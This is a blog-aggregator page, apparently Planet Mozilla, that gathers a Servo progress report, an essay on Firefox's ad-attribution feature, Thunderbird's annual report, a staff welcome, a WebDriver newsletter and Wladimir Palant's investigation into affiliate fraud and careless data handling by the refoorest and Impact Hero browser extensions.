The post Thunderbird Monthly Development Digest: September 2024 appeared first on The Thunderbird Blog.

The Servo BlogThis month in Servo: Android nightlies, right-to-left, WebGPU, and more!

Servo nightly showing new support for <ul type>, right-to-left layout, ‘table-layout: fixed’, ‘object-fit’, ‘object-position’, crypto.getRandomValues(BigInt64Array) and (BigUint64Array), and innerText and outerText

Servo has had several new features land in our nightly builds over the last month:

Servo’s flexbox support continues to mature, with support for ‘align-self: normal’ (@Loirooriol, #33314), plus corrections to cross-axis percent units in descendants (@Loirooriol, @mrobinson, #33242), automatic minimum sizes (@Loirooriol, @mrobinson, #33248, #33256), replaced flex items (@Loirooriol, @mrobinson, #33263), baseline alignment (@mrobinson, @Loirooriol, #33347), and absolute descendants (@mrobinson, @Loirooriol, #33346).

Our table layout has improved, with support for width and height presentational attributes (@Loirooriol, @mrobinson, #33405, #33425), as well as better handling of ‘border-collapse’ (@Loirooriol, #33452) and extra <col> and <colgroup> columns (@Loirooriol, #33451).

We’ve also started working on the intrinsic sizing keywords ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ (@Loirooriol, @mrobinson, #33492). Before we can support them, though, we needed to land patches to calculate intrinsic sizes, including for percent units (@Loirooriol, @mrobinson, #33204), aspect ratios of replaced elements (@Loirooriol, #33240), column flex containers (@Loirooriol, #33299), and ‘white-space’ (@Loirooriol, #33343).

We’ve also worked on our WebGPU support, with support for pipeline-overridable constants (@sagudev, #33291), and major rework to GPUBuffer (@sagudev, #33154) and our canvas presentation (@sagudev, #33387). As a result, GPUCanvasContext now properly supports (re)configuration and resize on GPUCanvasContext (@sagudev, #33521), presentation is now faster, and both are now more conformant with the spec.

Performance and reliability

Servo now sends font data over shared memory (@mrobinson, @mukilan, #33530), saving a huge amount of time over sending font data over IPC channels.

We now debounce resize events for faster window resizing (@simonwuelker, #33297), limit document title updates (@simonwuelker, #33287), and use DirectWrite kerning info for faster text shaping on Windows (@crbrz, #33123).

Servo has a new kind of experimental profiling support that can send profiling data to Perfetto (on all platforms) and HiTrace (on OpenHarmony) via tracing (@atbrakhi, @delan, #33188, #33301, #33324), and we’ve instrumented Servo with this in several places (@atbrakhi, @delan, #33189, #33417, #33436). This is in addition to Servo’s existing HTML-trace-based profiling support.

We’ve also added a new profiling Cargo profile that builds Servo with the recommended settings for profiling (@delan, #33432). For more details on building Servo for profiling, benchmarking, and other perf-related use cases, check out our updated Building Servo chapter (@delan, book#22).

Build times

The first patch towards splitting up our massive script crate has landed (@sagudev, #33169), over ten years since that issue was first opened.

script is the heart of the Servo rendering engine — it contains the HTML event loop plus all of our DOM APIs and their bindings to SpiderMonkey, and the script thread drives the page lifecycle from parsing to style to layout. script is also a monolith, with over 170 000 lines of hand-written Rust plus another 520 000 lines of generated Rust, and it has long dominated Servo’s build times to the point of being unwieldy, so it’s very exciting to see that we may be able to change this.

Contributors to Servo can now enjoy faster self-hosted CI runners for our Linux builds (@delan, @mrobinson, #33321, #33389), cutting a typical Linux-only build from over half an hour to under 8 minutes, and a typical T-full try job from over an hour to under 42 minutes.

We’ve now started exploring self-hosted macOS runners (@delan, ci-runners#3), and in the meantime we’ve landed several fixes for self-hosted build failures (@delan, @sagudev, #33283, #33308, #33315, #33373, #33471, #33596).

servoshell on desktop with improved tabbed browsing UI
servoshell on Android with new navigation UI

Beyond the engine

You can now download the Servo browser for Android on servo.org (@mukilan, #33435)! servoshell now supports gamepads by default (@msub2, #33466), builds for OpenHarmony (@mukilan, #33295), and has better navigation on Android (@msub2, #33294).

Tabbed browsing on desktop platforms has become a lot more polished, with visible close and new tab buttons (@Melchizedek6809, #33244), key bindings for switching tabs (@Melchizedek6809, #33319), as well as better handling of empty tab titles (@Melchizedek6809, @mrobinson, #33354, #33391) and the location bar (@webbeef, #33316).

We’ve also fixed several HiDPI bugs in servoshell (@mukilan, #33529), as well as keyboard input and scrolling on Windows (@crbrz, @jdm, #33225, #33252).

Donations

Thanks again for your generous support! We are now receiving 4147 USD/month (+34.7% over July) in recurring donations. This includes donations from 12 people on LFX, but we will stop accepting donations there soon — please move your recurring donations to GitHub or Open Collective.

Servo is also on thanks.dev, and already eleven GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.

4147 USD/month
10000

With this money, we’ve been able to pay for our web hosting and self-hosted CI runners for Windows and Linux builds, and when the time comes, we’ll be able to afford macOS runners, perf bots, and maybe even an Outreachy intern or two! As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Don Martiwhy I’m turning off Firefox ad tracking: the PPA paradox

Previously: turn off advertising features in Firefox

I am turning off the controversial Privacy-preserving attribution (PPA) advertising tracking feature in Firefox, even though, according to the documentation, there are some good things about PPA compared to cookies:

  • You can’t be identified individually as the same person who saw an ad and then bought something

  • A site can’t tell if you have PPA on or off

Those are both interesting and desirable properties, and the PPA system, if implemented correctly and run honestly, does not look like a problem on its own. So why are people creeped out by it? That creeped-out feeling is not coming from privacy math ignorance, it’s people’s inner behavioral economists warning about an information imbalance. Just like people who grow up playing ball can catch a ball without consciously doing calculus, people who grow up in market economies get a pretty good sense of markets and information, which manifests as a sense of being creeped out when something about a market design doesn’t seem right.

The problem is not the design of PPA on its own, it’s that PPA is being proposed as something to run on the real Web, a place where you can find both the best legit ad-supported content and the most complicated scams. And that creates a PPA paradox: this privacy-preserving attribution feature, if it catches on, will tend to increase the amount of surveillance. PPA doesn’t have all of the problems of privacy-enhancing technologies in web browsers, but this is a big one.

Briefly, the way that PPA is designed to work is that sites that run ads will run JavaScript to request that the browser store impression events to keep a record of the ad you saw, and then a site where you buy stuff can record a conversion and then get a report to find out which sites the people who bought stuff had seen ads on. The browser doesn’t directly share the impression events with the site where you buy stuff. It generates an encrypted message that might or might not include impressions, then the site passes those encrypted messages to secure services to do math on them and create an aggregated report. The report doesn’t make it possible to match any individual ad impression to any individual sale.

So, as a web entrepreneur willing to bend the rules, how would you win PPA? You could make a site where people pay attention to the ads, and hope that gets them to buy stuff, so you get more ad money that way. The problem with that is that legit ad-supported content and legit, effective advertising are both hard. Not only do you need to make a good site, the advertisers who run their ads on it need to make effective ads in order for you to win this way. An easier way to win the PPA game is to run a crappy site and then (1) figure out who’s about to buy, (2) trick those people into visiting your crappy site, and (3) tell the browser to store an impression before the sale you predicted, so that your crappy site gets credit for making the sale. And steps 1 and 2 work better and better the more surveillance you can do, including tracking people between web and non-web activity, smart TV mics, native mobile SDKs, server-to-server CAPIs, malware, use your imagination.

(Update 14 Oct 2024) PPA has an antitrust problem, too. In a market where the average user has their activity passed to Meta by thousands of companies, Meta has a large advantage when training a machine learning system to steal conversions by placing an ad in front of someone who would be likely to buy anyway. With PPA, a large surveillance company would not have to deliberately tell anyone to do fraud, or write code to do fraud. Instead, ML systems designed to win PPA would learn to do fraud, since if you have the surveillance data anyway, fraud is the quickest, easiest way to get money. (Like I said, legit conversions are hard.) And unlike what happened in legacy fraud cases like Uber v. Fetch, with PPA enough data is deliberately obfuscated to make the fraud impossible to track down. Only a few large companies have the combination of ML and large inflows of user data to make this kind of invisible, deniable fraud possible, so PPA looks like a tool for problematic concentration in the Internet and advertising businesses.

Of course, attribution stealing schemes are a thing with conventional cookie and mobile app tracking, too. And they have been for quite a while. But conventional tracking generally produces enough extra info to make it possible to do more interesting attribution systems that enable marketers to figure out when legit and not-so-legit conversions are happening. If you read Mobile Dev Memo by Eric Seufert and other high-end marketing sites, there is a lot of material about more sophisticated atribution models than what’s possible with PPA. Marketers have a constant set of stats problems to solve to figure out which of the ads are going to influence people in the direction of buying stuff, and which ad money is being wasted because it gets spent on claiming credit for selling a thing that customers were going to buy anyway. PPA doesn’t provide the info needed to get good answers for those stats problems—so what works like a privacy feature on its own would drive the development and deployment of more privacy risks. I’m turning it off, and I hope that enough people will join me to keep PPA from catching on.

More: or we could just not

Related

Campaigners claim ‘Privacy Preserving Attribution’ in Firefox does the opposite (more coverage of the EU complaint)

PET projects or real privacy?

Move at the speed of trust

Google’s revised ad targeting plan triggers fresh competition concerns in UK

Protecting Your Privacy While Eroding Your Democracy: Apple’s and Mozilla’s PPAs (Privacy Preserving Ad Attribution) Considered Harmful by Asif Youssuff Unfortunately, after studying each proposal, I predict they will inadvertently lend themselves to further incentivize the publication and spread of low-quality information (including misinformation), polluting the information landscape and threatening democracies worldwide.

the colored pencil test for web features A web browser is the agent of the user, and should act in the user’s interest, which means doing what the user would do for themselves if they had time.

Mozilla ThunderbirdState Of The Bird: Thunderbird Annual Report 2023-2024

We’ve just released Thunderbird version 128, codenamed “Nebula”, our yearly stable release. So with that big milestone done, I wanted to take a moment and tell our community about the state of Thunderbird. In the past I’ve done a recap focused solely on the project’s financials, which is interesting – but doesn’t capture all of the great work that the project has accomplished. So, this time, I’m going to try something different. I give you the State of the Bird: Thunderbird Annual Report 2023-2024.

Before we jump into it, on behalf of the Thunderbird Team and Council, I wanted to extend our deepest gratitude to the hundreds of thousands of people who generously provided financial support to Thunderbird this past year. Additionally, Thunderbird would like to thank the many volunteers who contributed their time to our many efforts. It is not an exaggeration to say that this product would not exist without them. All of our contributors are the lifeblood of Thunderbird. They are the beacons shining brightly to remind us of the transformative power of open source, and the influence of the community that stands alongside it. Thank you for not just being on this journey with us, but for making the journey possible.


Supernova & Nebula

Thunderbird Supernova 115 blazed into existence on July 11, 2023. This Extended Support Release (ESR) not only introduced cool code names for releases, but also helped bring Thunderbird a modern look and experience that matched the expectation of users in 2023. In addition to shedding our outdated image, we also started tackling something which prevented a brisk development pace and steady introduction of new features: two decades of technical debt.

After three years of slow decline in Daily Active Users (DAUs), the Supernova release started a noticeable upward trend, which reaffirms that the changes we made in this release are putting us on the right track. What our users were responding to wasn’t just visual, however. As we’ve noted many times before – Supernova was also a very large architectural overhaul that saw the cleanup of decades of technical debt for the mail front-end. Supernova delivered a revamped, customizable mail experience that also gave us a solid foundation to build the future on.

Fast forwarding to Nebula, released on July 11, 2024, we built upon many of the pillars that made Supernova a success. We improved the look and feel, usability, customization and speed of the mail experience in truly substantial ways. Additionally, many of the investments in improving the Thunderbird codebase began to pay dividends, allowing us to roll in preliminary Exchange support and use native OS notifications.

All of the work that has happened with Supernova and Nebula is an effort to make Thunderbird a first-class email and productivity tool in its own right. We’ve spent years paying down technical debt so that we could focus more on the features and improvements that bring value to our users. This past year we got to leverage all that hard work to create a truly great Thunderbird experience.

K-9 Mail & Thunderbird For Android

In response to the enormous demand for Thunderbird on a phone, we’ve worked hard to lay a solid foundation for our Android release. The effort to turn K-9 Mail into something we can confidently call a great Thunderbird experience on-the-go is coming along nicely.

In April of 2023, we released K-9 6.600 with a message view redesign that brought K-9 and Thunderbird more in line. This release also had a more polished UI, among other fixes, improvements, and changes. Additionally, it integrated our new design system with reusable components that will allow quicker responses to future design changes in Android.

The 6.7xx Beta series, developed throughout 2023, primarily focused on improving account setup. The main reason for this change is to enable seamless email account setup. This also started the transition of K-9’s UI from traditional Android XML layouts to using the more modern and now recommended Jetpack Compose UI toolkit, and the adoption of Atomic Design principles for a cohesive, intuitive design. The 6.710 Beta release in August was the first to include the new account setup for more widespread testing. Introducing new account setup code and removing some of the old code was a step in the right direction.

In other significant events of 2023, we hired Wolf Montwé as a senior software engineer, doubling the K-9 Mail team at MZLA! We also conducted a security audit with 7ASecurity and OSTIF. No critical issues were found, and many non-critical issues were fixed. We began experimenting with Material 3 and based on positive results, decided to switch to Material 3 before renaming the app. Encouraged by our community contributors, we moved to Weblate for localization. Weblate is better integrated into K-9 and is open source. Some of our time was also spent on necessary maintenance to ensure the app works properly on the latest Android versions.

So far this year, we’ve shipped the account setup improvements to everyone and continued work on Material 3 and polishing the app in preparation for its transition to “Thunderbird for Android.” You can look at individual release details in our GitHub repository and track the progress we’ve made there. Suffice to say, the work on creating an amazing Android experience has been significant – and we look forward to sharing the first true Thunderbird release on Android in the next few months.

Services and  Infrastructure

In 2023 we began working in earnest on delivering additional value to Thunderbird users through a suite of web services. The reasoning? There are some features that would add significant value to our users that we simply can’t do in the Thunderbird clients alone. We can, however, create amazing, open source, privacy-respecting services that enhance the Thunderbird experience while aligning with our values – and that’s what we’ve been doing.

The services that we’ve focused on are: Appointment, a calendar scheduling tool; Send, an encrypted large-file transfer service; and Thunderbird Sync, which will allow users to sync their Thunderbird settings between devices (both desktop and Android).

Thunderbird Appointment enables you to plan less and do more. You can add your calendars to the service, outline your weekly availability and then send links that allow others to grab time on your schedule. No more long back-and-forth email threads to find a time to meet, just send a link. We’ve just opened up beta testing for the service and look forward to hearing from early users what features our users would like to see. For more information on Thunderbird Appointment, and if you’d like to sign up to be a beta tester, check out our Thunderbird Appointment blog post. If you want to look at the code, check out the repository for the project on GitHub.

The Thunderbird team was very sad when Firefox Send was shut down. Firefox Send made it possible to send large files easily, maybe easier than any other tool on the Internet. So we’re reviving it, but not without some nice improvements. Thunderbird Send will not only allow you to send large files easily, but our version also encrypts them. All files that go through Send are encrypted, so even we can’t see what you share on the service. This privacy focus was important in building this tool because it’s one of our core values, spelled out in the Mozilla Manifesto (principle 4): “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.”

Finally, after many requests for this feature, I’m happy to share that we are working hard to make Thunderbird Sync available to everyone. Thunderbird Sync will allow you to sync your account and application settings between Thunderbird clients, saving time at setup and headaches when you use Thunderbird on multiple devices. We look forward to sharing more on this front in the near future.

2023 Financial Picture

All of the above work was made possible because of our passionate community of Thunderbird users. 2023 was a year of significant investment into our team and our infrastructure, designed to ensure the continued long-term stability and sustainability of Thunderbird. As previously mentioned these investments would not have been possible without the remarkable generosity of our financial contributors.

Contribution Revenue

Total financial contributions in 2023 reached $8.6M, reflecting a 34.5% increase over 2022. More than 515,000 transactions from over 300,000 individual contributors generated this financial support (26% of the transactions were recurring monthly contributions).

In addition to that incredible total, what stands out is that the majority of our contributions were modest. The average contribution amount was $16.90, and the median amount was $11.12.

We are often asked if we have “super givers” and the refreshing answer is “no, we simply have a super community.” To underscore this, consider that 61% of giving was $20 or less, and 95% of the transactions were $35 or less. The number of transactions $1000 and above accounted for only 56 transactions; that’s effectively 0.0007% of all contribution transactions.

And this super community helping us sustain and improve Thunderbird is very much a global one, with contributions pouring in from more than 200 countries! The top five giving countries — Germany, the United States, France, the United Kingdom, and Japan — accounted for 63% of our contribution revenue and 50% of transactions. We believe this global support is a testament to the universal value of Thunderbird and the core values the project stands for.

Expenses

Now, let’s talk about how we’re using these funds to keep Thunderbird thriving well into the future. 

As with most organizations, employee-related expenses are the largest expense category. The second highest category for us are all the costs associated with distributing Thunderbird to tens of millions of users and the operations that help make that happen. You can see our spending across all categories below:

The Importance of Supporting Thunderbird

When I started at Thunderbird (in 2017), we weren’t on a sustainable path. The cost of building, maintaining and distributing Thunderbird to tens of millions of people was too great when compared against the financial contributions we had coming in. Fast forward to 2023 and we’re able to not only deliver Thunderbird to our users without worrying about keeping the lights on, but we are able to fix bugs, build new features and invest in new platforms (Android). It’s important for Thunderbird to exist because it’s not just another app, but one built upon real values.

Our values are:

  • We believe in privacy. We don’t collect your data or spy on you, what you do in Thunderbird is your business, not ours.
  • We believe in digital wellbeing. Thunderbird has no dark patterns, we don’t want you doomscrolling your email. Apps should help, not hurt, you. We want Thunderbird to help you be productive.
  • We believe in open standards. Email works because it is based on open standards. Large providers have undermined these standards to lock users into their platforms. We support and develop the standards to everyone’s benefit.

If you share these values, we ask that you consider supporting Thunderbird. The tech you use doesn’t have to be built upon compromises. Giving to Thunderbird allows us to create good software that is good for you (and the world). Consider giving to support Thunderbird today.

2023 Community Snapshot

As we’ve noted so many times in the previous paragraphs, it’s because of Thunderbird’s open source community that we exist at all. In order to better engage with and acknowledge everyone participating in our projects, this past year we set up a Bitergia instance, which is now public. Bitergia has allowed us to better measure participation in the community and find where we are doing well and improving, and areas where there is room for improvement. We’ve pulled out some interesting metrics below.

For reference, Github and Bugzilla measure developer contributions. TopicBox measures activity across our many mailing lists. Pontoon measures the activity from volunteers who help us translate and localize Thunderbird. SUMO measures the impact of Thunderbird’s support volunteers who engage with our users and respond to their varied support questions.

Contributor & Community Growth

Thank You

In conclusion, we’d simply like to thank this amazing community of Thunderbird supporters who give of their time and resources to create something great. 2023 and 2024 have been years of extraordinary improvement for Thunderbird and the future looks bright. We’re humbled and pleased that so many of you share our values of privacy, digital wellbeing and open standards. We’re committed to continuing to provide Thunderbird for free to everyone, everywhere – thanks to you!

The post State Of The Bird: Thunderbird Annual Report 2023-2024 appeared first on The Thunderbird Blog.

Support.Mozilla.OrgIntroducing Andrea Murphy

Hi folks,

Super excited to share with you all. Andrea Murphy is joining our team as a Customer Experience Community Program Manager, covering for Konstantina while she’s out on maternity leave. Here’s a short intro from Andrea:

Greetings everyone! I’m thrilled to join the team as Customer Experience Community Program Manager. I work on developing tools, programs and experiences that support, inspire and empower our extraordinary network of volunteers. I’m from Rochester, NY and when I’m not at the office, I’m chasing waterfalls around our beautiful state parks, playing pinball or planning road trips with carefully curated playlists that include fun facts about all of my favorite artists. I’m a pop culture enthusiast, and very good at pub trivia. Add me to your team!

You’ll get a chance to meet Andrea in today’s community call. In the meantime, please join me to welcome Andrea into our community. (:

Firefox Developer ExperienceFirefox WebDriver Newsletter 131

WebDriver is a remote control interface that enables introspection and control of user agents. As such it can help developers to verify that their websites are working and performing well with all major browsers. The protocol is standardized by the W3C and consists of two separate specifications: WebDriver classic (HTTP) and the new WebDriver BiDi (Bi-Directional).

This newsletter gives an overview of the work we’ve done as part of the Firefox 131 release cycle.

Contributions

Firefox – including our WebDriver implementation – is developed as an open source project, and everyone is welcome to contribute. If you ever wanted to contribute to an open source project used by millions of users, or are interested in some experience in software development, jump in.

We are always grateful to receive external contributions, here are the ones which made it in Firefox 131:

WebDriver code is written in JavaScript, Python, and Rust so any web developer can contribute! Read how to setup the work environment and check the list of mentored issues for Marionette.

General

Bug fixes

WebDriver BiDi

New: Add support for remaining arguments of “network.continueResponse”

In Firefox 131 we added support for the remaining arguments of the "network.continueResponse" command, such as cookies, headers, statusCode and reasonPhrase. This allows clients to modify cookies, headers, status codes (e.g., 200, 304), and status text (e.g., “OK”, “Not modified”) during the "responseStarted" phase, when a real network response is intercepted, while preserving the response body.

-> {
  "method": "network.continueResponse",
  "params": {
    "request": "12",
    "headers": [
      { 
        "name": "test-header", 
        "value": { 
          "type": "string", 
          "value": "42"
        }
      }
    ],
    "reasonPhrase": "custom status text",
    "statusCode": 404
  },
  "id": 2
}

<- { "type": "success", "id": 2, "result": {} }

Bug fixes

Wladimir PalantLies, damned lies, and Impact Hero (refoorest, allcolibri)

Transparency note: According to Colibri Hero, they attempted to establish a business relationship with eyeo, a company that I co-founded. I haven’t been in an active role at eyeo since 2018, and I left the company entirely in 2021. Colibri Hero was only founded in 2021. My investigation here was prompted by a blog comment.

Colibri Hero (also known as allcolibri) is a company with a noble mission:

We want to create a world where organizations can make a positive impact on people and communities.

One of the company’s products is the refoorest browser extension, promising to make a positive impact on the climate by planting trees. Best of it: this costs users nothing whatsoever. According to the refoorest website:

Plantation financed by our partners

So the users merely need to have the extension installed, indicating that they want to make a positive impact. And since the concept was so successful, Colibri Hero recently turned it into an SDK called Impact Hero (also known as Impact Bro), so that it could be added to other browser extensions.

What the company carefully avoids mentioning: its 56,000 “partners” aren’t actually aware that they are financing tree planting. The refoorest extension and extensions using the Impact Hero SDK automatically open so-called affiliate links in the browser, making certain that the vendor pays them an affiliate commission for whatever purchases the users make. As the extensions do nothing to lead users to a vendor’s offers, this functionality likely counts as affiliate fraud.

The refoorest extension also makes very clear promises to its users: planting a tree for each extension installation, two trees for an extension review as well as a tree for each vendor visit. Clearly, this is not actually happening according to the numbers published by Colibri Hero themselves.

What does happen is careless handling of users’ data despite the “100% Data privacy guaranteed” promise. In fact, the company didn’t even bother to produce a proper privacy policy. There are various shady practices including a general lack of transparency, with the financials never disclosed. As proof of trees being planted the company links to a “certificate” which is … surprise! … its own website.

Mind you, I’m not saying that the company is just pocketing the money it receives via affiliate commissions. Maybe they are really paying Eden Reforestation (not actually called that any more) to plant trees and the numbers they publish are accurate. As a user, this is quite a leap of faith with a company that shows little commitment to facts and transparency however.

What is Colibri Hero?

Let’s get our facts straight. First of all, what is Colibri Hero about? To quote their mission statement:

Because more and more companies are getting involved in social and environmental causes, we have created a SaaS solution that helps brands and organizations bring impactful change to the environment and communities in need, with easy access to data and results. More than that, our technology connects companies and non-profit organizations together to generate real impact.

Our e-solution brings something new to the demand for corporate social responsibility: brands and organizations can now offer their customers and employees the chance to make a tangible impact, for free. An innovative way to create an engaged community that feels empowered and rewarded.

You don’t get it? Yes, it took me a while to understand as well.

This is about companies’ bonus programs. Like: you make a purchase, you get ten points for the company’s loyalty program. Once you have a few hundred of those points, you can convert them into something tangible: getting some product for free or at a discount.

And Colibri Hero’s offer is: the company can offer people to donate those points, for a good cause. Like planting trees or giving out free meals or removing waste from the oceans. It’s a win-win situation: people can feel good about themselves, the company saves themselves some effort and Colibri Hero receives money that they can forward to social projects (after collecting their commission of course).

I don’t know whether the partners get any proof of money being donated other than the overview on the Colibri Hero website. At least I could not find any independent confirmation of it happening. All photos published by the company are generic and from unrelated events. Except one: there is photographic proof that some notebooks (as in: paper that you write on) have been distributed to girls in Sierra Leone.

Few Colibri Hero partners report the impact of this partnership or even its existence. The numbers are public on Colibri Hero website however if you know where to look for them and who those partners are. And since Colibri Hero left the directory index enabled for their Google Storage bucket, the logos of their partners are public as well.

So while Colibri Hero never published a transparency report themselves, it’s clear that they partnered up with less than 400 companies. Most of these partnerships appear to have never gone beyond a trial, the impact numbers are negligible. And despite Colibri Hero boasting their partnerships with big names like Decathlon and Foot Locker, the corresponding numbers are rather underwhelming for the size of these businesses.

Colibri Hero runs a shop which they don’t seem to link anywhere but which gives a rough impression of what they charge their partners. Combined with the public impact numbers (mind you, these have been going since the company was founded in 2021), this impression condenses into revenue numbers far too low to support a company employing six people in France, not counting board members and ethics advisors.

And what about refoorest?

This is likely where the refoorest extension comes in. While given the company’s mission statement this browser extension with its less than 100,000 users across all platforms (most of them on Microsoft Edge) sounds like a side hustle, it should actually be the company’s main source of income.

The extension’s promise sounds very much like that of the Ecosia search engine: you search the web, we plant trees. Except that with Ecosia you have to use their search engine while refoorest supports any search engine (as well as Linkedin and Twitter/X which they don’t mention explicitly). Suppose you are searching for a new pair of pants on Google. One of the search results is Amazon. With refoorest you see this:

Screenshot of a Google search result pointing to Amazon’s Pants category. Above it an additional link with the text “This affiliate partner is supporting refoorest’s tree planting efforts” along with the picture of some trees overlaid with the text “+1”.

If you click the search result you go to Amazon as usual. Clicking that added link above the search result however will send you to the refoorest.com domain, where you will be redirected to the v2i8b.com domain (an affiliate network) which will in turn redirect you to amazon.com (the main page, not the pants one). And your reward for that effort? One more tree added to your refoorest account! Planting trees is really easy, right?

One thing is odd about this extension’s listing on Chrome Web Store: for an extension with merely 20,000 users, 2.9K ratings is a lot.

Screenshot of a Chrome Web Store listing. The title says: “refoorest: plant trees for free.” The extension is featured, has 2.9K ratings with the average of 4.8 stars and 20,000 users.

One reason is: the extension incentivizes leaving reviews. This is what the extension’s pop-up looks like:

Screenshot of an extension pop-up. At the bottom a section titled “Share your love for refoorest” and the buttons “Leave a Review +2” and “Add your email +2”

Review us and we will plant two trees! Give us your email address and we will plant another two trees! Invite fifteen friends and we will plant a whole forest for you!

The newcomer: Impact Hero

Given the success of refoorest, it’s unsurprising that the company is looking for ways to expand this line of business. What they recently came up with is the Impact Hero SDK, or Impact Bro as its website calls it (yes, really). It adds an “eco-friendly mode” to existing extensions. To explain it with the words of the Impact Bros (highlighting of original):

With our eco-friendly mode, you can effortlessly plant trees and offset carbon emissions at no cost as you browse the web. This allows us to improve the environmental friendliness of our extension.

Wow, that’s quite something, right? And how is that possible? That’s explained a little further in the text:

Upon visiting one of these merchant partners, you’ll observe a brief opening of a new tab. This tab facilitates the calculation of the required carbon offset.

Oh, calculation of the required carbon offset, makes sense. That’s why it loads the same website that I’m visiting but via an affiliate network. Definitely not to collect an affiliate commission for my purchases.

Just to make it very clear: the thing about calculating carbon offsets is a bold lie. This SDK earns money via affiliate commissions, very much in the same way as the refoorest extension. But rather than limiting itself to search results and users’ explicit clicks on their link, it will do this whenever the user visits some merchant website.

Now this is quite unexpected functionality. Yet Chrome Web Store program policies require the following:

All functionalities of extensions should be clearly disclosed to the user, with no surprises.

Good that the Impact Hero SDK includes a consent screen, right? Here is what it looks like in the Chat GPT extension:

Screenshot of a pop-up with the title: “Update! Eco-friendly mode, Chat GPT.” The text says “Help make the world greener as you browse. Just allow additional permissions to unlock a better future.” There are buttons labeled “Allow to unlock” and “Deny.”

Yes, this doesn’t really help users make an informed decision. And if you think that the “Learn more” link helps, it leads to the page where I copied the “calculation of the required carbon offset” bullshit from.

The whole point of this “consent screen” seems to be tricking you into granting the extension access to all websites. Consequently, this consent screen is missing from extensions that already have access to all websites out of the box (including the two extensions owned by Colibri Hero themselves).

There is one more area that Colibri Hero focuses on to improve its revenue: their list of merchants that the extensions download each hour. This discussion puts the size of the list at 50 MB on September 6. When I downloaded it on September 17 it was already 62 MB big. By September 28 the list has grown to 92 MB. If this size surprises you: there are lots of duplicate entries. amazon.com alone is present 615 times in that list (some metadata differs, but the extensions don’t process that metadata anyway).

Affected extensions

In addition to refoorest I could identify two extensions bought by Colibri Hero from their original author as well as 14 extensions which apparently added Impact Hero SDK expecting their share of the revenue. That’s Chrome Web Store only, the refoorest extension at the very least also exists in various other extension stores, even though it has been removed from Firefox Add-ons just recently.

Here is the list of extensions I found and their current Chrome Web Store stats:

Name Weekly active users Extension ID
Bittorent For Chrome 40,000 aahnibhpidkdaeaplfdogejgoajkjgob
Pro Sender - Free Bulk Message Sender 20,000 acfobeeedjdiifcjlbjgieijiajmkang
Memory Match Game 7,000 ahanamijdbohnllmkgmhaeobimflbfkg
Turbo Lichess - Best Move Finder 6,000 edhicaiemcnhgoimpggnnclhpgleakno
TTV Adblock Plus 100,000 efdkmejbldmccndljocbkmpankbjhaao
CoPilot™ Extensions For Chrome 10,000 eodojedcgoicpkfcjkhghafoadllibab
Local Video-Audio Player 10,000 epbbhfcjkkdbfepjgajhagoihpcfnphj
AI Shop Buddy 4,000 epikoohpebngmakjinphfiagogjcnddm
Chat GPT 700,000 fnmihdojmnkclgjpcoonokmkhjpjechg
GPT Chat 10,000 jncmcndmaelageckhnlapojheokockch
Online-Offline MS Paint Tool 30,000 kadfogmkkijgifjbphojhdkojbdammnk
refoorest: plant trees for free 20,000 lfngfmpnafmoeigbnpdfgfijmkdndmik
Reader Mode 300,000 llimhhconnjiflfimocjggfjdlmlhblm
ChatGPT 4 20,000 njdepodpfikogbbmjdbebneajdekhiai
VB Sender - Envio em massa 1,000 nnclkhdpkldajchoopklaidbcggaafai
ChatGPT to Notion 70,000 oojndninaelbpllebamcojkdecjjhcle
Listen On Repeat YouTube Looper 30,000 pgjcgpbffennccofdpganblbjiglnbip

Edit (2024-10-01): Opera already removed refoorest from their add-on store.

But are they actually planting trees?

That’s a very interesting question, glad you asked. See, refoorest considers itself to be in direct competition with the Ecosia search engine. And Ecosia publishes detailed financial reports where they explain how much money they earn and where it went. Ecosia is also listed as a partner on the Eden: People+Planet website, so we have independent confirmation here that they in fact donated at least a million US dollars.

I searched quite thoroughly for comparable information on Colibri Hero. All I could find was this statement:

We allocate a portion of our income to operating expenses, including team salaries, social charges, freelancer payments, and various fees (such as servers, technical services, placement fees, and rent). Additionally, funds are used for communications to maximize the service’s impact. Then, 80% of the profits are donated to global reforestation projects through our partner, Eden Reforestation.

While this sounds good in principle, we have no idea how high their operational expenses are. Maybe they are donating half of their revenue, maybe none. Even if this 80% rule is really followed, it’s easy to make operational expenses (like the salary of the company founders) so high that there is simply no profit left.

Edit (2024-10-01): It seems that I overlooked them in the list of partners. So they did in fact donate at least 50 thousand US dollars. Thanks to Adrien de Malherbe of Colibri Hero for pointing this out. Edit (2024-10-02): According to the Internet Archive, refoorest got listed here in May 2023 and they have been in the “$50,000 - $99,999” category ever since. They were never listed with a smaller donation, and they never moved up either – almost like this was a one-time donation. As of October 2024, the Eden: People+Planet website puts the cost of planting a tree at $0.75.

And other than that they link to the certificate of the number of trees planted:

Screenshot of the text “Check out refoorest’s impact” followed by the statement “690,121 trees planted”

But that’s their own website, just like the maps of where trees are being planted. They can make it display any number.

Now you are probably thinking: “Wladimir, why are you so paranoid? You have no proof that they are lying, just trust them to do the right thing. It’s for a good cause!” Well, actually…

Remember that the refoorest extension promises its users to plant a specific number of trees? One for each extension installation, two for a review, one more tree each time a merchant website is visited? What do you think, how many trees came together this way?

One thing about Colibri Hero is: they don’t seem to be very fond of protecting data access. Not only their partners’ stats are public, the user data is as well. When the extension loads or updates the user’s data, there is no authentication whatsoever. Anybody can just open my account’s data in their browser provided that they know my user ID:

Screenshot of JSON data displayed in the browser. There are among others a timestamp field displaying a date and time, a trees field containing the number 14 and a browser field saying “chrome.”

So anybody can track my progress – how many trees I’ve got, when the extension last updated my data, that kind of thing. Any stalkers around? Older data (prior to May 2022) even has an email field, though this one was empty for the accounts I saw.

How you might get my user ID? Well, when the extension asks me to promote it on social networks and to my friends, these links contain my user ID. There are plenty of such links floating around. But as long as you aren’t interested in a specific user: the user IDs are incremental. They are even called row_index in the extension source code.

See that index value in my data? We now know that 2,834,418 refoorest accounts were created before I decided to take a look. Some of these accounts certainly didn’t live long, yet the average still seems to be beyond 10 trees. But even ignoring that: two million accounts are two million trees just for the install.

According to their own numbers refoorest planted less that 700,000 trees, far less than those accounts “earned.” In other words: when these users were promised real physical trees, that was a lie. They earned virtual points to make them feel good, when the actual count of trees planted was determined by the volume of affiliate commissions.

